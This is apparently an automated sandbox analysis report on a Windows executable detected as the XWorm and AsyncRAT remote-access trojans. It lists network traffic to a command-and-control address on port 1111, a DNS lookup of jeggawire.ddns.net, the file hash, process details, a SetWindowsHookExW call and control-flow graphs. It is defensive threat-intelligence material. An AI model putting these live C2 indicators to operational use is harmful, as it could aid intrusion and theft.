                  Mar 30, 2025 21:31:47.839116096 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:47.839200020 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:48.077091932 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:48.077181101 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:48.304569960 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:48.304666042 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:48.530850887 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:48.537950993 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:48.816857100 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:48.820985079 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:49.099770069 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:50.313796043 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:50.543293953 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:50.547458887 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:50.813910961 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:52.376288891 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:52.612713099 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:52.620939970 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:52.896893978 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:52.899554014 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:53.127477884 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:53.133512974 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:53.410343885 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:54.079368114 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:54.308825970 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:54.308924913 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:54.532670975 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:54.535605907 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:54.761313915 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:54.761512995 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:55.110364914 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:55.355479956 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:55.359498024 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:55.590162992 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:55.590261936 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:55.958446026 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:56.191418886 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:57.611278057 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:57.693639040 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:59.470916033 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:59.705193996 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:31:59.708964109 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:31:59.988610983 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:04.798108101 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:05.022728920 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:05.022841930 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:05.249310017 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:05.249392986 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:05.729531050 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:05.782087088 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:05.782262087 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:06.008691072 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:06.008802891 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:06.281393051 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:18.173437119 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:18.532042027 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:18.758284092 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:19.048079014 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:19.317950964 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:19.661331892 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:19.664124966 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:19.944808960 CEST111149682176.65.134.56192.168.2.8
                  Mar 30, 2025 21:32:19.947510958 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:20.313328028 CEST496821111192.168.2.8176.65.134.56
                  Mar 30, 2025 21:32:20.538043976 CEST111149682176.65.134.56192.168.2.8
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 30, 2025 21:28:19.100069046 CEST5620153192.168.2.81.1.1.1
                  Mar 30, 2025 21:28:19.208246946 CEST53562011.1.1.1192.168.2.8
                  Mar 30, 2025 21:29:01.937881947 CEST5362940162.159.36.2192.168.2.8
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 30, 2025 21:28:19.100069046 CEST192.168.2.81.1.1.10x3dafStandard query (0)jeggawire.ddns.netA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 30, 2025 21:28:19.208246946 CEST1.1.1.1192.168.2.80x3dafNo error (0)jeggawire.ddns.net176.65.134.56A (IP address)IN (0x0001)false
                  • File
                  • Registry
                  • Network

                  Click to dive into process behavior distribution

                  Target ID:0
                  Start time:15:28:12
                  Start date:30/03/2025
                  Path:C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe"
                  Imagebase:0x5d0000
                  File size:36'864 bytes
                  MD5 hash:919D580A19380DEBBF5159EC58C35562
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  Execution Graph

                  Execution Coverage

                  Dynamic/Packed Code Coverage

                  Signature Coverage

                  Execution Coverage:18.5%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:3
                  Total number of Limit Nodes:0
                  Show Legend
                  Hide Nodes/Edges
                  execution_graph 4291 7ff936862128 4293 7ff936862131 SetWindowsHookExW 4291->4293 4294 7ff936862201 4293->4294

                  Executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 113 7ff936862a28-7ff936869fe0 call 7ff9368605d8 117 7ff936869fe5-7ff93686a025 113->117 121 7ff93686a09b 117->121 122 7ff93686a027-7ff93686a044 117->122 123 7ff93686a0a0-7ff93686a0b5 121->123 122->123 125 7ff93686a046-7ff93686a096 call 7ff9368694c0 122->125 127 7ff93686a0ce-7ff93686a0e3 123->127 128 7ff93686a0b7-7ff93686a0c9 call 7ff9368605e8 123->128 145 7ff93686ace6-7ff93686acf4 125->145 134 7ff93686a0e5-7ff93686a111 127->134 135 7ff93686a116-7ff93686a12b 127->135 128->145 134->145 141 7ff93686a12d-7ff93686a139 call 7ff936867fa0 135->141 142 7ff93686a13e-7ff93686a153 135->142 141->145 150 7ff93686a199-7ff93686a1ae 142->150 151 7ff93686a155-7ff93686a158 142->151 156 7ff93686a1ef-7ff93686a204 150->156 157 7ff93686a1b0-7ff93686a1b3 150->157 151->121 153 7ff93686a15e-7ff93686a169 151->153 153->121 154 7ff93686a16f-7ff93686a194 call 7ff9368605c0 call 7ff936867fa0 153->154 154->145 164 7ff93686a206-7ff93686a209 156->164 165 7ff93686a231-7ff93686a246 156->165 157->121 158 7ff93686a1b9-7ff93686a1c4 157->158 158->121 160 7ff93686a1ca-7ff93686a1ea call 7ff9368605c0 call 7ff936862a78 158->160 160->145 164->121 168 7ff93686a20f-7ff93686a22c call 7ff9368605c0 call 7ff936862a80 164->168 173 7ff93686a24c-7ff93686a2ac call 7ff936860548 165->173 174 7ff93686a332-7ff93686a347 165->174 168->145 173->121 214 7ff93686a2b2-7ff93686a2e1 173->214 182 7ff93686a349-7ff93686a34c 174->182 183 7ff93686a366-7ff93686a37b 174->183 182->121 185 7ff93686a352-7ff93686a361 call 7ff936862a58 182->185 191 7ff93686a39d-7ff93686a3b2 183->191 192 7ff93686a37d-7ff93686a380 183->192 185->145 200 7ff93686a3b4-7ff93686a3cd 191->200 201 7ff93686a3d2-7ff93686a3e7 191->201 192->121 194 7ff93686a386-7ff93686a398 call 7ff936862a58 192->194 194->145 200->145 205 7ff93686a3e9-7ff93686a402 201->205 206 7ff93686a407-7ff93686a41c 201->206 205->145 212 7ff93686a41e-7ff93686a42c 206->212 213 7ff93686a43c-7ff93686a451 206->213 215 7ff93686a432-7ff93686a437 212->215 217 7ff93686a47a-7ff93686a48f 213->217 218 7ff93686a453-7ff93686a456 213->218 215->145 224 7ff93686a52f-7ff93686a544 217->224 225 7ff93686a495-7ff93686a4b0 217->225 218->121 220 7ff93686a45c-7ff93686a475 218->220 220->145 229 7ff93686a55c-7ff93686a571 224->229 230 7ff93686a546-7ff93686a557 224->230 225->215 232 7ff93686a4b2-7ff93686a50d 225->232 235 7ff93686a577-7ff93686a5c6 229->235 236 7ff93686a611-7ff93686a626 229->236 230->145 232->121 252 7ff93686a513-7ff93686a52a 232->252 262 7ff93686a5c8-7ff93686a5de 235->262 263 7ff93686a5e2-7ff93686a5ef 235->263 243 7ff93686a63e-7ff93686a653 236->243 244 7ff93686a628-7ff93686a639 236->244 250 7ff93686a685-7ff93686a69a 243->250 251 7ff93686a655-7ff93686a680 call 7ff936860ed0 call 7ff9368694c0 243->251 244->145 258 7ff93686a6a0-7ff93686a772 call 7ff936860ed0 call 7ff9368694c0 250->258 259 7ff93686a777-7ff93686a78c 250->259 251->145 252->145 258->145 270 7ff93686a853-7ff93686a868 259->270 271 7ff93686a792-7ff93686a795 259->271 262->263 263->121 268 7ff93686a5f5-7ff93686a60c 263->268 268->145 281 7ff93686a87c-7ff93686a891 270->281 282 7ff93686a86a-7ff93686a877 call 7ff9368694c0 270->282 274 7ff93686a79b-7ff93686a7a6 271->274 275 7ff93686a848-7ff93686a84d 271->275 274->275 278 7ff93686a7ac-7ff93686a846 call 7ff936860ed0 call 7ff9368694c0 274->278 283 7ff93686a84e 275->283 278->283 290 7ff93686a908-7ff93686a91d 281->290 291 7ff93686a893-7ff93686a8a4 281->291 282->145 283->145 297 7ff93686a91f-7ff93686a922 290->297 298 7ff93686a95d-7ff93686a972 290->298 291->121 300 7ff93686a8aa-7ff93686a8ba call 7ff9368605b8 291->300 297->121 302 7ff93686a928-7ff93686a958 call 7ff9368605b0 call 7ff9368605c0 call 7ff936862a30 297->302 313 7ff93686a9b8-7ff93686a9cd 298->313 314 7ff93686a974-7ff93686a9b3 call 7ff936869180 call 7ff936868450 call 7ff936862a38 298->314 308 7ff93686a8bc-7ff93686a8e1 call 7ff9368694c0 300->308 309 7ff93686a8e6-7ff93686a903 call 7ff9368605b8 call 7ff9368605c0 call 7ff936862a30 300->309 302->145 308->145 309->145 329 7ff93686aa6d-7ff93686aa82 313->329 330 7ff93686a9d3-7ff93686aa68 call 7ff936860ed0 call 7ff9368694c0 313->330 314->145 329->145 342 7ff93686aa88-7ff93686aa8f 329->342 330->145 348 7ff93686aa91-7ff93686aa9b call 7ff936867fd0 342->348 349 7ff93686aaa2-7ff93686aade 342->349 348->349 349->145
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID: _u6
                  • API String ID: 0-2070151557
                  • Opcode ID: 2ad99b942af34641e089eb71ade4aab836a60b64bb1aab79969f04222708bb9f
                  • Instruction ID: 9c1f05c7ff3fbeefb5957c0b82953c168f82f6871756ab09dccd878396c85288
                  • Opcode Fuzzy Hash: 2ad99b942af34641e089eb71ade4aab836a60b64bb1aab79969f04222708bb9f
                  • Instruction Fuzzy Hash: E2627130B1C90A4FFB68F7288495BBA76DAFF98310F554578D11ED32C2DEA8B8429741

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 470 7ff936866876-7ff936866883 471 7ff93686688e-7ff936866957 470->471 472 7ff936866885-7ff93686688d 470->472 476 7ff936866959-7ff936866962 471->476 477 7ff9368669c3 471->477 472->471 476->477 479 7ff936866964-7ff936866970 476->479 478 7ff9368669c5-7ff9368669ea 477->478 485 7ff9368669ec-7ff9368669f5 478->485 486 7ff936866a56 478->486 480 7ff9368669a9-7ff9368669c1 479->480 481 7ff936866972-7ff936866984 479->481 480->478 483 7ff936866986 481->483 484 7ff936866988-7ff93686699b 481->484 483->484 484->484 487 7ff93686699d-7ff9368669a5 484->487 485->486 488 7ff9368669f7-7ff936866a03 485->488 489 7ff936866a58-7ff936866b00 486->489 487->480 490 7ff936866a3c-7ff936866a54 488->490 491 7ff936866a05-7ff936866a17 488->491 500 7ff936866b6e 489->500 501 7ff936866b02-7ff936866b0c 489->501 490->489 492 7ff936866a19 491->492 493 7ff936866a1b-7ff936866a2e 491->493 492->493 493->493 495 7ff936866a30-7ff936866a38 493->495 495->490 503 7ff936866b70-7ff936866b99 500->503 501->500 502 7ff936866b0e-7ff936866b1b 501->502 504 7ff936866b1d-7ff936866b2f 502->504 505 7ff936866b54-7ff936866b6c 502->505 510 7ff936866b9b-7ff936866ba6 503->510 511 7ff936866c03 503->511 506 7ff936866b31 504->506 507 7ff936866b33-7ff936866b46 504->507 505->503 506->507 507->507 509 7ff936866b48-7ff936866b50 507->509 509->505 510->511 512 7ff936866ba8-7ff936866bb6 510->512 513 7ff936866c05-7ff936866c96 511->513 514 7ff936866bef-7ff936866c01 512->514 515 7ff936866bb8-7ff936866bca 512->515 521 7ff936866c9c-7ff936866cab 513->521 514->513 516 7ff936866bce-7ff936866be1 515->516 517 7ff936866bcc 515->517 516->516 519 7ff936866be3-7ff936866beb 516->519 517->516 519->514 522 7ff936866cad 521->522 523 7ff936866cb3-7ff936866d18 call 7ff936866d34 521->523 522->523 530 7ff936866d1f-7ff936866d33 523->530 531 7ff936866d1a 523->531 531->530
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5aff440e4e41b30c2698bc5082635a59d7bb3aadfb0acce73a3772ec808a8e54
                  • Instruction ID: 5db0eb9401d8f0608d237b098f865fd1e7a24577b229b282683e0d9ddf281f7f
                  • Opcode Fuzzy Hash: 5aff440e4e41b30c2698bc5082635a59d7bb3aadfb0acce73a3772ec808a8e54
                  • Instruction Fuzzy Hash: 49F1A930508A8D8FEBA8DF28D855BE97BD1FF58310F04426EE85DC7291CF74A9958782

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 532 7ff936867622-7ff93686762f 533 7ff93686763a-7ff936867707 532->533 534 7ff936867631-7ff936867639 532->534 538 7ff936867709-7ff936867712 533->538 539 7ff936867773 533->539 534->533 538->539 541 7ff936867714-7ff936867720 538->541 540 7ff936867775-7ff93686779a 539->540 547 7ff93686779c-7ff9368677a5 540->547 548 7ff936867806 540->548 542 7ff936867759-7ff936867771 541->542 543 7ff936867722-7ff936867734 541->543 542->540 545 7ff936867736 543->545 546 7ff936867738-7ff93686774b 543->546 545->546 546->546 549 7ff93686774d-7ff936867755 546->549 547->548 550 7ff9368677a7-7ff9368677b3 547->550 551 7ff936867808-7ff93686782d 548->551 549->542 552 7ff9368677ec-7ff936867804 550->552 553 7ff9368677b5-7ff9368677c7 550->553 557 7ff93686782f-7ff936867839 551->557 558 7ff93686789b 551->558 552->551 554 7ff9368677c9 553->554 555 7ff9368677cb-7ff9368677de 553->555 554->555 555->555 559 7ff9368677e0-7ff9368677e8 555->559 557->558 560 7ff93686783b-7ff936867848 557->560 561 7ff93686789d-7ff9368678cb 558->561 559->552 562 7ff93686784a-7ff93686785c 560->562 563 7ff936867881-7ff936867899 560->563 568 7ff9368678cd-7ff9368678d8 561->568 569 7ff93686793b 561->569 564 7ff93686785e 562->564 565 7ff936867860-7ff936867873 562->565 563->561 564->565 565->565 567 7ff936867875-7ff93686787d 565->567 567->563 568->569 571 7ff9368678da-7ff9368678e8 568->571 570 7ff93686793d-7ff936867a15 569->570 581 7ff936867a1b-7ff936867a2a 570->581 572 7ff9368678ea-7ff9368678fc 571->572 573 7ff936867921-7ff936867939 571->573 575 7ff9368678fe 572->575 576 7ff936867900-7ff936867913 572->576 573->570 575->576 576->576 577 7ff936867915-7ff93686791d 576->577 577->573 582 7ff936867a2c 581->582 583 7ff936867a32-7ff936867a94 call 7ff936867ab0 581->583 582->583 590 7ff936867a9b-7ff936867aaf 583->590 591 7ff936867a96 583->591 591->590
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c22716ff3f299b4dfc7ce4d70a1d65c58cdf7ed714da6e5106d2132074f3f3bb
                  • Instruction ID: 57e6d80cb8a156316afd8868d4286419b852f7f6a88ea732b4e66651db37329b
                  • Opcode Fuzzy Hash: c22716ff3f299b4dfc7ce4d70a1d65c58cdf7ed714da6e5106d2132074f3f3bb
                  • Instruction Fuzzy Hash: 97E1B430908A4D8FEBA8DF28C859BE97BE1EF58310F14426ED85DC7291DF78A94587C1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 377 7ff936862128-7ff93686212f 378 7ff93686213a-7ff9368621ad 377->378 379 7ff936862131-7ff936862139 377->379 383 7ff936862239-7ff93686223d 378->383 384 7ff9368621b3-7ff9368621b8 378->384 379->378 385 7ff9368621c2-7ff9368621ff SetWindowsHookExW 383->385 386 7ff9368621bf-7ff9368621c0 384->386 387 7ff936862207-7ff936862238 385->387 388 7ff936862201 385->388 386->385 388->387
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID: HookWindows
                  • String ID:
                  • API String ID: 2559412058-0
                  • Opcode ID: 4b12f980fb1e832b260077bfee80c993d8a2e25bfcb38972287cfc63e8628fac
                  • Instruction ID: c37cfee7ea9e0aaff3f50366749e01e3ae9d9225161da2db94276aaf10d0ab7b
                  • Opcode Fuzzy Hash: 4b12f980fb1e832b260077bfee80c993d8a2e25bfcb38972287cfc63e8628fac
                  • Instruction Fuzzy Hash: E7410730A1CA494FEB18DB5C98467F9BBE5EB59321F00427ED00DC3292CAB5B812C781

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b95bdb234afc048e904526ec3877c189fa09fe92dd90a00f1c454ca5f3ed638
                  • Instruction ID: 6397c36c8e9e2cbf34b74b06c351b93679ecbaf509d419aeab6ad680a17cc7f6
                  • Opcode Fuzzy Hash: 0b95bdb234afc048e904526ec3877c189fa09fe92dd90a00f1c454ca5f3ed638
                  • Instruction Fuzzy Hash: 7A71D52054E3C45FE347D338A858BA53FA5AF87229F0981FAE098CE4A3DAD95456D343